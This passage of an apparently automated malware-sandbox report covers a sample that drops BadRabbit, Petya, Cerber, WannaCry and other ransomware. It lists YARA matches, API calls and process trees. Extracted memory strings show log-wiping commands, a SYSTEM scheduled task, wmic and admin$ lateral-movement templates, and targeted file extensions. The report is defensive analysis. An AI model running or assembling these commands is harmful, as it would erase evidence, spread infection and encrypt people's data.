        Source: 21.2.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.2.DCD7.tmp.7ff629520000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 4.3.rundll32.exe.3363160.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 4.3.rundll32.exe.3363160.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 44.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 44.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 44.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 44.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 26.0.Endermanch@InfinityCrypt.exe.7131cc.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: 1.0.Endermanch@BadRabbit.exe.880000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.rundll32.exe.3363160.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 4.2.rundll32.exe.32e55b8.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.rundll32.exe.32e55b8.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 35.0.dispci.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 35.0.dispci.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 1.2.Endermanch@BadRabbit.exe.6ffbc8.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.rundll32.exe.3363160.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 44.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 44.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 00000005.00000000.332123066.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 00000015.00000000.345508345.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000002C.00000000.370824731.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 00000015.00000000.344932527.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 00000015.00000000.345317728.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 00000005.00000002.385124639.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 00000005.00000002.390905891.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 0000002C.00000002.555421468.000000000041A000.00000080.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 00000005.00000002.386803461.0000000001520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 00000015.00000002.347606708.00007FF62952E000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 0000002C.00000000.367403583.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 0000002C.00000000.369916835.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 00000005.00000000.332507985.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 00000005.00000000.331532732.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 00000005.00000000.329772556.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 0000002C.00000000.368588781.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: Process Memory Space: rundll32.exe PID: 5608, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.datJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A48A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,4_2_04A48A23
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeFile created: C:\Windows\infpub.datJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: String function: 004039AC appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004078A0 CallWindowProcA,NtdllDefWindowProc_A,3_2_004078A0
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00405E18 SetWindowLongA,GetWindowLongA,NtdllDefWindowProc_A,3_2_00405E18
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00560077 NtAllocateVirtualMemory,3_2_00560077
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_0056093C NtQuerySystemInformation,3_2_0056093C
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00561B31 NtProtectVirtualMemory,3_2_00561B31
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00560FCD NtFreeVirtualMemory,3_2_00560FCD
        Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
        Source: shi2B2E.tmp.53.drStatic PE information: Resource name: None type: DOS executable (COM)
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: No import functions for PE file found
        Source: wKAwMsck.exe.47.drStatic PE information: No import functions for PE file found
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: No import functions for PE file found
        Source: rCUUIQEQ.exe.47.drStatic PE information: No import functions for PE file found
        Source: 4W5dQXszUV.exe, 00000000.00000000.304448777.0000020A36B78000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs 4W5dQXszUV.exe
        Source: 4W5dQXszUV.exe, 00000000.00000002.588438201.0000020A36CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4W5dQXszUV.exe
        Source: 4W5dQXszUV.exeBinary or memory string: OriginalFilenamed.exe$ vs 4W5dQXszUV.exe
        Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: Security
        Source: 4W5dQXszUV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: csrss.exe.38.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: wKAwMsck.exe.47.drStatic PE information: Section .text
        Source: rCUUIQEQ.exe.47.drStatic PE information: Section .text
        Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
        Source: Endermanch@Xyeta.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942863805970149
        Source: 4W5dQXszUV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: DECRYPT.lnk.35.drLNK file: ..\..\..\Windows\dispci.exe
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\Desktop\BadRabbit.zipJump to behavior
        Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@110/160@10/100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,4_2_04A49534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_04A41368
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,4_2_04A49534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A48313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,4_2_04A48313
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: rundll32.exe, 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, dispci.exe, 00000023.00000000.361028775.0000000000AD3000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nKgYAAYU.bat" "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe""
        Source: 4W5dQXszUV.exeReversingLabs: Detection: 64%
        Source: 4W5dQXszUV.exeVirustotal: Detection: 61%
        Source: 4W5dQXszUV.exeMetadefender: Detection: 24%
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\4W5dQXszUV.exe "C:\Users\user\Desktop\4W5dQXszUV.exe"
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe"
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe"
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe"
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
